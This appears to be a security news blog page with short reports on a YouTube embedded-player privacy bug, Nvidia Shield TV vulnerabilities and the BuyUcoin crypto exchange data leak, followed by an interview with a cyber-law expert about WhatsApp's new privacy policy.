Search This Blog

Latest News

Digital Concentration Camp: Tech giants are playing God

Recent events in the United States have shown that the tech giants do not care about the constitution, this is a cause for concern. There a...

All the recent news you need to know

Cyber Security Researcher Exposes the Biggest Threat Regarding YouTube Users Privacy

 

David Schutz, a security researcher uncovered the potential unauthorized access to a user’s viewing history, favorites, and playlists by the threat actors. Threat actors manipulated the website and embedded a YouTube video to secure access to a user’s viewing history and playlists.

Threat actors managed to earn $1,337 via the security bug, Schutz explained that he discovered the vulnerabilities by linking two things – in a somewhat “unexpected” manner. Website developers utilize YouTube embedded player to embed videos into their own site and this player also has a feature known as API (Application Programming Interface). 

API lets users embed functions commonly executed on YouTube into their personal website or application. API also allows the users to retrieve, insert, delete or update many of these resources. A resource constitutes a kind of item that comprises part of the YouTube experience which includes loading a new video or playlist, subscription, play/pause the player.

Every user on YouTube has a few personal playlists, for example, the playlist with the ID ‘HL’ comprises the user’s viewing history and the ID with ‘WL’ contains the user’s view later and so on.

David Schutz explained the vulnerabilities via blog post: “Since the YT embedded player is also logged in to YT, a malicious website could have embedded a player, instructed it to play e.g., the ‘HL’ playlist (which would start playing the currently visiting user’s watch history), and get the contents of the playlists using the API the embedded player has, thereby stealing the watch history of the user who opened the website”.

“The attacker could also have prepared a page for a specific victim, which when opened by that victim, would steal the victim’s unlisted videos (which otherwise would require knowing the ID to watch). The main issue was that you were able to load private playlists into the player in the name of the victim, and later steal the contents of those private playlists,” the post further read. 

The Streamer for Gamer Nvidia Shield Tv Detected with Security Bugs

 

Computer gaming giant that goes by the motto of “level up experience more”, Nvidia detected bugs in its Shield TV. This gaming company is an American multinational technology company headquartered in California, USA. Nvidia is an artificial intelligence computing giant. The foremost work of Nvidia is to design graphics processing unit (GPU) for the gaming world and the professional market. They also develop the system on a chip unit for the mobile computing and automotive market.

In recent times, Nvidia acknowledged three security bugs in the Nvidia Shield TV which could have proved to be harmful and may permit services denial with rights escalation and data loss of the user. Nvidia Shield TV has been developed for gamers to play smart house, PC games from the PC console to television, and stream on and off the local and online internet servers. Better said, it’s a “set-top gadget” used for gaming. Subsequently, for the video-friendly graphics processing unit (GPU) monitor device, Nvidia solely published a security alert for a security bug cluster detected. 

Nvidia Shield TV interface, the NVDEC part of the hardware-dependent decoder encompasses a high– severity by CVE- 2021- 1068. Such bugs arise in the hardware when the actors can write or read from a memory location that is outside the scope of the intended boundary of the buffer. This issue later may lead to a service denial or the escalation of privileges. It has a fair rating of 7.8 CVSS.

The remaining two bugs do not hold high- severity. The flaw CVE- 2021- 1069 was detected in the NV host feature and could easily cause the data to be lost due to the null point reference. Whereas another bug CVE- 2021- 1067 endures in the application of the RPMB command status. In the RPMB command, the actors can write to the Write Protect Configuration Block, which also may lead to a service denial or the escalation of privileges. By using the upgrade note that appears on the notification screen, or via the Settings>About>System update, users can download and install the software update to secure a system. It will prevent them from any further loss of data by the detected bugs.

Indian Crypto Exchange BuyUcoin Hacked

 

In yet another data breach, sensitive information of almost 3.25 lakh clients of India-based global cryptocurrency exchange and wallet, BuyUcoin, have been exposed on the Dark Web. The information leak incorporates names, emails, mobile numbers, encrypted passwords, user wallet details, order details, bank details, KYC details (PAN number, passport numbers), and deposit history. 

Established in July of 2016, BuyUcoin is a crypto wallet and trade stage where merchants and purchasers can transact with digital assets like bitcoin, ethereum, ripple, and so forth. It is based out of Delhi-NCR in India. 

As per independent cybersecurity researcher Rajshekhar Rajaharia, the 6GB document on the MongoDB database contains three backup files containing BuyUcoin information. 

"This is a serious hack as key financial, banking and KYC details have been leaked on the Dark Web," Rajaharia said and shared some screenshots of the leaked information. 

The leaked information could be utilized by attackers to run fraudulent assaults against people, the researcher said. He likewise added that the information could empower hackers to comprehend the credit score of the victims utilizing transaction details. 

Researchers at cybersecurity firm Kela Research and Strategy Ltd originally found the stolen information, connected on a similar forum, from Wongnai Media Co Ltd, Tuned Global Pvt Ltd, BuyUcoin, Wappalyzer, Teespring Inc and Bonobos.com, which looks at the craftsmanship of scandalous hacking group ShinyHunters. "Over this past summer, ShinyHunters was seen publishing leaked information for free, uncovering a large number of individual records from all over the world," Victoria Kivilevich, threat intelligence analyst at Kela Research told. 

As per Rajaharia, the hacker is the same who earlier leaked BigBasket and JusPay information in India. In November a year ago, one of India's well-known online supermarkets BigBasket found that its information of more than 20 million clients had been hacked and was on sale on the dark web for more than $40,000. Recently, Bengaluru-based digital payments gateway JusPay said that about 3.5 crore records with masked card information and card fingerprint were compromised by the hacker. 

While denying the leak, BuyUcoin CEO and Co-founder Shivam Thakral said, “We would like to reiterate the fact that only dummy data of 200 entries were impacted which was immediately recovered and secured by our automated security systems.”

Naavi: Information collected from WhatsApp would be shared with Facebook and eventually be used for advertising

The WhatsApp messenger, which is owned by Facebook, began to notify its users (which is about 2 billion) about the update of the privacy policy. Do you want to keep using the popular messaging app?

On 18 January we conducted an interview with a veteran Cyber Law specialist in India Vijayashankar Na (Mr. Naavi) and he shared with us his opinion on the new privacy policy of WhatsApp messenger and how it impacts the users.

Please introduce yourself to our readers.

I'm the chairman of a foundation of data protection professionals in India, which is the primary organization in India working on data protection, providing certifications, audit, support and so on. Since 1998 I was working on cyber law issues which was based on our law called the information technology act. Moreover, I'm the founder of Cyber Law College, a virtual Cyber Law Education institution. Now we have extended it to data protection.

On January 4, WhatsApp announced that from February 8, all users of the messenger (except for residents of the EU and the UK) will be forced to share their personal data with Facebook — the social network will have access to phone numbers, transaction information and IP addresses. What has changed?

Actually, compared to what happened before, there may not be significant changes. We know that WhatsApp has been acquired by Facebook, but we are not very sure whether the information from WhatsApp was being shared with Facebook. But I believe it was happening in the background which we do not know. But maybe now, because they don't want to take any chances with particularly the GDPR (General Data Protection Regulation) authorities they wanted to actually be transparent about what they would like to do. I think this was driven more by the GDPR considerations to just polish their current privacy policies so that any problems could be sorted out.

WhatsApp wanted to disclose the fact that some part of the information collected from WhatsApp would be shared with Facebook and eventually be used for advertising.

So we all know that WhatsApp is a free app. In fact, it's popularity or growth in popularity was because it was free. But it cannot continue like that forever because there has to be a revenue model for any company. Now WhatsApp has come out to the open and through the new policy has declared what kind of information they are likely to share.

WhatsApp contains two sets of data. One is the metadata - contact list, location, status, financial information and data such as your unique phone ID. So, it all reflects a certain characteristic of persons. That usage information itself is actually a treasure if properly analyzed for the purpose of profiling the person.

As we know from the news, WhatsApp's innovations have already angered technology experts, privacy advocates, billionaire entrepreneurs and government organizations. But the main thing is that they provoked the flight of users. Why did this happen?

WhatsApp made a big mistake in the sense that they did not clarify properly what do they want to do. They said that this change is only for business applications. But pop up about update actually came for all individuals who are having a personal WhatsApp account. Subsequently, WhatsApp said in the Press release that this is only for business accounts, not for individual accounts. Then the people asked, "why did WhatsApp show this particular pop up to me at all? If it was not meant for me?" It was psychologically, very disturbing for people.

Moreover, the problem with WhatsApp today is PR. Actually, they drafted it in such a manner that it would actually create revulsion amongst the people. In my opinion, it was a bad PR "Get it or Leave it". We know that the privacy policy should be return in clear and precise terms that an ordinary person can understand. Going that WhatsApp should have been a little more careful.

So, it has become easy for people to download Signal, Telegram. And of course in India, there will be a moment to develop our own indigenous apps. So maybe WhatsApp is going to lose more than what, perhaps it could have.

What do you think, why does Facebook need this metadata?

Instagram and Facebook are now going to be able to show even more targeted ads on Facebook and Instagram, having carefully studied the interests and preferences of users in the messenger. In addition, businesses will be able to accept payments in WhatsApp for products that users have selected in Instagram ads.

Whether we like WhatsApp or not, whether we like Facebook or not, they also have the right to say that I cannot do it on free service forever. Now advertising requests profiling, without profiling advertisements cannot be targeting.

If the person wants to give the information by way of consent, let him give it. So this is a fair game between business interests and personal privacy interests. It's how GDPR is building. There has to be a legal basis.

WhatsApp will read our messages. Is it true?

As it is generally stated, they are not supposed to be reading our messages. Our conversations are encrypted using end-to-end encryption, and, the company says, even WhatsApp itself can not access them. So, the content is getting encrypted with some device-related ID. So, at the moment it leaves my device, It should get encrypted.

Now in case people actually go for backups, storage in the cloud, then there is an issue. So people should avoid cloud storage and make the backup only within the mobile.

In your article "WhatsApp needs to change its Jurisdiction clause in the Terms or else, exit from India" you said that "WhatsApp has created two different sets of policies, one offered by WhatsApp Ireland Ltd to the EU region and the other by WhatsApp LLC  to other countries". How does this apply to India?

In India, on 8 February we were expecting the parliament to pass the Indian data protection law. In my opinion, WhatsApp decided to change the privacy policy on 8 February only to preempt the data protection law.

When I said that "we need to look for a change of WhatsApp in India" was not because of the privacy issue, it's a question of analyzing the privacy policy, that is a matter of revising the privacy policy.

My issue was in the terms of use one of the clauses - jurisdictions. Of course, this is not exclusive to WhatsApp. It happens in many other international web services. The jurisdiction clause says that if there is any dispute between the user of WhatsApp and WhatsApp, then the dispute has to be resolved in accordance with the Californian law and in the district court of California automated binding arbitration there. It means that the use of WhatsApp in India is not going to have any grievance mechanism in India, this is not in accordance with our law, our law doesn't permit it. It is almost denying the government's interest. I'm not happy with that. I would like that to be changed.

Will you continue to use WhatsApp, or have you changed Messenger?

In our professional circles, actually, we have made some moves. Many of the professionals prefer Signal. Of course, some people prefer to Telegram a bit more. Earlier Telegram was the most used platform due to the number of people in the groups. In fact, we were thinking of shifting our FDPPI group to Telegram.

What do you can recommend to our readers?

If somebody is going to have serious professional discussions, financial discussions, then obviously they should look at shifting to Signal. If it is purely personal, family discussions, you can keep using WhatsApp. So, you need to make a distinction between personal use, family use and professional use. If you want 500 people to be in your group then no have a choice, but to leave a WhatsApp. If it's a small group that handles confidential information, need to change to Telegram.

We've covered quite a bit in this conversation. Before we wrap up, is there anything else you'd like to to add?

The only thing I want to say is that we need clarity amongst the ordinary people on what is privacy and what is that we are willing to protect in privacy. It is not absolute protection. It is always the protection of the choice. And the fact that there are, even if you shift from WhatsApp to Telegram, we don't know whether Telegram will remain free forever.

I feel there is a need for this harmonious relationship between the users and the organizations that make use of the data. And that is the purpose of the data protection law. And when we interpret data protection law, again, we should not be totally one-sided. That is the beauty of this issue, balancing the whole thing.